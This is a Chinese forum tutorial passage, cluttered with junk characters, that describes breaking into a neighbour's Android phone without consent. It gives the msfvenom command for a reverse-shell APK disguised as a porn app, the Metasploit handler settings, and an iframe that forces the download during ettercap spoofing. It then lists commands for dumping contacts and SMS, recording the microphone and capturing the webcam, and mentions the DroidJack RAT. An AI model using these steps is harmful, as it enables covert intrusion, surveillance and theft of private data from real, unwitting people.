! E! R. j# q5 o z 五、msf+ettercap入侵邻居安卓手机 . V/ m. @( _$ u1 o
% u4 }! u2 e7 g3 W U- ]" E- L3 q/ n3 b9 }; E
首先启动msf + o2 A J% D" [6 B7 i8 {8 r
1 F# W( Y0 T( \" n+ c) ]& ?, i0 n
5 k, f3 l9 P8 F0 u
先用kali生成一个安卓木马,如下命令: / Q4 B& ]. q1 [& g, J
# x' }& P, j3 M$ g. g4 B! a/ b1 b' g
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 2 q% R$ h9 O) w9 U2 L& A; X
( d! r/ {# Y5 ]- r4 @; Z( j# {
& v4 J- \6 A. m( e. V. |' L1 B 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 # ~& p8 o- S/ k% H; u
3 G! N! b0 }8 o) I7 s# I7 S0 B+ M; [0 Y2 J* v! ]' n. m; C: ^
然后进入msf
! \( K8 p" O) D/ G6 I1 A. i 9 Y* e) N' a; j f: o+ R) u
+ d& q, f" j" K5 _/ S4 R% b1 ?. e) K- x
use exploit/multi/handler w1 G3 {& u2 J$ N2 k
7 ^ z( [7 E' r4 {% ], _
4 [2 D1 }6 ]- W5 o+ U8 f set payload android/meterpreter/reverse_tcp N( P; a$ @* u8 \: `
. x+ w$ Y, n. R7 ?" r$ }: Y$ R/ N, \. P8 W$ h% ^8 @' L
set LHOST 192.168.0.109 //ip为kaili的ip 0 \4 R* X/ v) f& [3 @3 P
, b# u+ I* M' K4 x* ]
7 @* n" b9 z5 r' p+ }3 M" h( E) z$ P
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
# ^ M* I& o/ {3 R+ L6 R- F
+ B) @' R5 w, k; j* [
& c1 [4 o: C2 s Exploit
. p) I4 l$ D/ i0 l; ^
6 t% U. Q2 N" w4 L) h0 {- O
" B- T- ]% D5 V& N5 ?. J
1 ^9 l, F8 R: ~9 ~6 D: t X. n* z0 v: F3 ]3 i1 ^, [% ]
* G, k' a3 F; u* N
下面我们开启ettercap -G * V* l: e; d+ e1 J, A
7 x: J& ~/ _1 N$ @2 K5 b0 c
! q1 i" f# J2 W5 R: |
我物理IP为
6 Z2 ~0 V* S9 ~' n* Z! b & X% Q8 E+ D) ~6 i
' o5 {) E0 S' Q1 N( X% B A/ D0 r2 P) Y1 \/ Y l
. l% D) y) K) Y4 k1 F% e9 i8 b ^5 U$ C! z8 n9 j9 I$ P g
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, " Z5 m4 n {7 p* P7 J& a c
/ A n2 N$ D; K
& _7 c ?( ~, [% E) ^9 n$ T 下面我们来设置一下 5 J# W, z/ X% N! y( C+ b
- L6 m7 p% z, Z3 m+ z
* e( l, v/ R5 K" P0 ?$ S
, I) ~: q5 B2 h, t/ J/ {4 a' } , V7 c* [* {8 Z9 `2 u
2 [0 O4 M% G6 |: }2 n
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, + L3 p' [- ]3 X7 N1 Q
6 l9 G+ `( x6 O7 D' u- U9 H) r) k2 Y3 w' \- Z$ `; o
3 G( {' A) [. @
) F: Q8 j+ i0 r- L& \+ \9 i5 h8 K
5 q1 Y+ z& j/ d% u6 T+ u n7 e7 ]8 J# D s. ?# O
' W0 ~6 S: p; g* g$ K$ [. _7 L, `
" v7 n% s6 Z; w" D5 K d a) Z
' m2 @0 s/ x& p& W. _, v& Q, S8 t+ S $ P. D9 @( |5 G. [+ i9 A' S3 @
2 @; V( _( {. C M0 r( O0 M
4 v4 }1 `: J7 `* _" Q2 m- C
" v U; d6 k) v* L- \4 o6 }5 {: ~0 O/ Z
+ T% [. V9 p# T. N- ^- g1 ^; G5 K
7 r" p8 t/ i/ y
% @* {) {2 A" R. B3 m * f/ a3 k: Q0 q$ z# d: _6 f
( Z! }1 h4 W4 {) I4 c+ Y; ]+ y* ^ `) L) Q
) k8 k/ @& D# w: ]7 ?3 B; K: A8 b( F
! x' o1 r! r# q* u& P
* o1 |2 ~. G2 K4 g% d* q D) k% q/ J' ~
" a$ F) }# x, `( x- }; i* Y
! _) p. k9 ]8 Z5 `" r. d& f
) t# E1 D+ }1 ^4 w+ J
! u/ R* {" k. Y9 E+ E& u& J0 b" z
0 j: P8 ?, O9 @& [) } 2 |6 Z8 X, h! `4 ]) l& k
- a: b8 K5 [5 } ?5 W2 `8 E+ K3 }1 E
' w) U/ L1 m: y) [6 {+ [
# `8 Y! x9 M5 p' R7 W m
4 _$ m5 I: _6 U k- I1 w
' ~5 A, h2 M7 ^& g9 y: H 5 }; J9 ^" V2 ^* M: D9 E2 y* `( ~
& t: t8 p* d( E# W# G 7 r' i2 m1 w. o7 T; R" h
5 O, c+ i8 l" l, J1 z6 W# F! x
# q7 z1 V8 K j9 F1 e
下面我们开始攻击
; t: x- R$ `- N+ Y 5 m* ]4 w# d: g) \; Z& @) t
* N4 ?2 B( f. |8 g7 T. N) p+ m
8 I2 h6 G! n b( T& l5 f * A6 P# m2 \. W8 w h) z
! x2 \+ D$ `( n$ p& c
! i) G- w) c3 a+ X6 z3 A
6 B! w8 `9 a) Q6 B* k- O2 |3 Z2 Z' _3 O
3 G* ~; s7 L- z2 g ( g' }# b5 m% |( h+ ?% n, q' y
6 E$ {: L8 a+ d9 s
, a# G/ v) H* K9 `; m
" f" G- @1 i: N r2 d
+ x$ I# t' Y; q& R( y# L 6 c) @& B, \' N6 J& a4 S
8 N& Z# h, m" @
2 C( A# t/ `" ?6 P. p$ R
大概过了5分钟多,发现反弹成功了 ! k! H* G/ ~; i$ _0 \0 s# `% }0 P0 Z
4 O! u) \9 T. D) M y) l
- C+ l; B& N+ \8 a( R3 D' a& `0 U
1 N1 k* U; W, b' e
! V9 O6 e; ]1 t3 Y. w) `
5 m4 D9 d2 v8 x& y7 i7 i2 w( c" u* F
7 y) E" O {, f0 l1 Q
1 \1 ~8 }5 m0 e2 @3 q: W! ^) b z1 E3 @ B% s. c$ E& j$ ?' C% a* \
4 S1 H. y2 v. [, o s7 Z
' q5 r8 l, n$ ?$ u0 s$ ]1 J& h( T$ L: d9 v2 {9 J' W6 w& l7 |) B) b$ X
3 W# E+ O, W) K* a
- X' j& z, u4 K: X2 _4 A) K6 |; v# x- V! o" }% W0 S* t' |6 Q
+ [# Z8 W( u9 \) t+ B0 f
. A7 ~! K' a: e# l4 u% n6 w j9 h L s* l' @ M7 g( z4 A7 O
6 Q% V {& H5 d: x R4 x# Z
5 _$ t! J) I! {( b: _
1 D2 P1 o2 p4 T, S. u B& P& R" w2 m 1 T5 n) Q( `& M3 h
& i* d& s2 a0 s |( G* D" _! m& g& o$ }$ P1 b$ g; u5 q; O5 f* T
执行命令 6 O( {$ F( W7 A
3 _7 i9 W* _5 r' v
: p, j7 K2 q- ?7 Y
; d. ?8 e2 D3 Q0 n8 R# @' R# A
6 F+ O( ~) h+ L2 ?, V Z. C, G# u/ \3 R5 t
dump_contacts --》这个是导出电话 / p+ {) w. X w( G* ~: e
1 T" c9 t' Y3 t; J% Q- i" a8 b2 P1 X& y1 [4 d0 ], F4 q
dump_sms --》这个是导出信息
" P/ u% u! M l ) p5 V( d& |! L
* m, D! e- j& L) r/ g record_mic Record audio from the default microphone for X seconds " J d4 ?' N! o: w
* i, M* r o0 q1 R- P" V" v
* R$ l1 I' O- G! K, O" v0 v9 g webcam_chat Start a video chat
! d/ a1 b X! e, f
8 q8 h- ^ e& |8 a; J ^, J1 w) v' Z/ @" M! @% Z
webcam_list List webcams " [5 `' g: ~; H4 N. m
9 _4 r# m' E" a7 Q X3 U3 ~/ u
8 M- ~0 ^9 R& Q# c/ Y# @$ |! \ webcam_snap Take a snapshot from the specified webcam
) t1 P8 E9 A# \8 L; V7 d8 S5 Z # U% @6 i1 }5 v9 [& _) x: ?! E3 u/ o
, \3 I& u; k& d: Z0 O6 Z2 ` webcam_stream  lay a video stream from the specified webcam $ F, |1 v' ?) V6 A& A# }9 o! i
) x M4 V; V* j. J5 C
! A+ F) d9 Z5 _2 G7 k
, I% l/ P; o; Q, C: j
. D! `: z- E1 m0 E' S* K! U. Z+ ~$ c, y
1 c9 c7 E) y' g3 {
" {& Y D- V6 c" i; ?7 m( ?2 J* P$ v' }# E
我们打开看一下电话薄, 8 J. ^! h4 p' O. U2 F$ [
1 s: K. S3 J& O+ k6 j
`: A' K+ c# z) ^! q8 i1 j % O+ B% y" x$ \$ s/ |4 X
: A: m& O9 F) H, a r
$ c |! v8 o" J* T1 n# F& J 2 z$ Y: R2 t2 G& h& |6 c
& P5 f9 h2 p: H c5 D& z9 F
9 \2 w, P$ } e7 u# q2 d. p $ N$ E3 a) L9 ?+ O: n" I+ P( T
0 t( e6 K# v# Q$ t# s b p
8 o: [4 E. v7 \ e, D: T# y
4 d" B+ m% I8 b: {" h
$ B) _0 }. _8 v( g3 o& J0 H) h0 E; u% F; d: X# ?3 v. J
1 F; |. r" i- Y6 D
0 S) {& R0 I% E" s3 p% s- J* W! Q4 |$ D( K
- B. }+ o! b q3 E9 J, @, t0 A5 U3 x
" C. O8 f# r7 U
) K# P) _0 U) T+ Y 我们同时欺骗成DroidJack木马,使用方法如图: 9 o, N/ _, ?2 c. J
3 ^) m( l$ K2 `5 B; u. `0 b$ u& A+ F( m$ M1 N
: K3 M7 y! D* K6 V5 i
! l7 j6 r$ k" U2 s E
9 v4 t: R2 Q5 q% ]2 \- M5 c; G0 @
* D! |8 U2 I: o$ s' R , M- T" s% t$ _: Y/ C
$ q4 r) b8 j" y: F
2 d0 K4 b! q: p" Z8 \: o. { 9 F1 e( E* ^( b& e
( O* l! P& o7 A' l( }( A& N
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
! e8 |! F w- U% \- U * E H/ `' F( V8 v4 r6 _0 d' S7 x
* _. y6 w" N$ d3 }. A: C) S; V- j
7 B7 S, D& O5 P) G 8 ^. o9 S0 x; _ N
1 G$ Y8 s! K' X6 A% }
0 R' Y' ^! D! z% @ L/ E5 h
9 L2 P6 T4 E2 P+ I7 z
3 `! c5 f1 F' \2 ?, X. p. a$ R 0 L$ z& `' O0 V$ Z% r
0 G3 z2 L3 m' Z; A: |
, T+ Q% l% R. h0 u! n
1 c- n n/ B" }8 @; j) k- ]+ v
1 U: u1 Q& D5 B1 z2 c' s" a/ v) k; i3 N P: @( b* G0 a
2 ?9 n; _! Q( U& x3 J1 A# t L' v
|